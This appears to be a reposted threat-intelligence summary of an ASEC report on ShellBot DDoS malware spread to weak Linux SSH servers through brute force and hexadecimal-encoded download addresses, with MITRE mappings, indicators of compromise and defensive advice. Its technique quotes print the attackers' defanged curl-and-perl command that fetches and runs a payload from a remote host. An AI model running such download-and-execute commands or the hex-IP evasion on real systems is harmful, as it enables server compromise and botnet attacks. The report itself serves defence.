Threat Research

ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses – ASEC BLOG

Securonix

ASEC reports ShellBot malware is now installed on poorly managed Linux SSH servers using hexadecimal IP addresses for its download URLs. The campaign features DDoS PBot v2.0 with IRC-based C2 and hex-encoded endpoints used to evade URL detection. #ShellBot #DDoSPBot #HexadecimalIP #LinuxSSH #IRC #dred

Keypoints

  • ShellBot targets poorly managed Linux SSH servers by leveraging credentials obtained for dictionary/brute-force access on port 22.
  • Download URLs for ShellBot have shifted from regular IP addresses to hexadecimal-encoded addresses to evade detection.
  • Past cases show actors also used decimal and hexadecimal IP notations to hide malicious URLs (e.g., a decimal address mapping to a DOT-decimal IP).
  • ShellBot is Perl-based, communicates via IRC with a C2 server, and has variants such as DDoS PBot v2.0 that use the installation name “dred.”
  • Administrative guidance includes strong passwords, timely patching, and firewall usage; ASEC TIP provides IOC details for ongoing monitoring.
  • The operation flow often involves scanning SSH-enabled systems, authenticating, downloading the payload with curl, and executing via Perl.

MITRE Techniques

  • [T1110] Brute Force – Use of a dictionary attack on SSH accounts to gain access. Quote: “use a list of commonly used SSH account credentials to initiate their dictionary attack.”
  • [T1078] Valid Accounts – If login succeeds, attackers install malware using valid credentials. Quote: “If they manage to successfully log in, they are able to install a variety of malware.”
  • [T1105] Ingress Tool Transfer – Payload is downloaded (via curl) and executed on the target. Quote: “curl -s -L hxxp://39.107.61[.]230/dred -o /tmp/dred;perl /tmp/dred”
  • [T1059] Command and Scripting Interpreter – Uses shell commands and Perl to install and run malware. Quote: “uname -a;lspci | grep -i –color ‘vga|3d|2d’;curl -s -L hxxp://39.107.61[.]230/dred -o /tmp/dred;perl /tmp/dred”
  • [T1071] Command and Control – Malware communicates with a C2 server via IRC channels. Quote: “IRC control commands” and “uses IRC protocol to communicate with a C&C server.”

Indicators of Compromise

  • [IP Address] attack source addresses and C2 endpoints – 61.242.178[.]220, 192.3.141[.]163:6667, and other addresses (attack source addresses and C2 endpoints)
  • [MD5] file hashes – 8853bb0aef4a3dfe69b7393ac19ddf7f, 7bc4c22b0f34ef28b69d83a23a6c88c5, and 1 more (ShellBot – past/recent)
  • [URL] download URLs – hxxp://39.107.61[.]230/dred, hxxp://39.165.53[.]17:8088/iposzz/dred, and 0x2763da4e/dred, 0x74cc54bd/static/home/dred/dred (recent)
  • [File Name] – dred (installation component used by ShellBot)
  • [C2 URL] – 192.3.141[.]163:6667 (ShellBot C2)

Read more: https://asec.ahnlab.com/en/57635/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint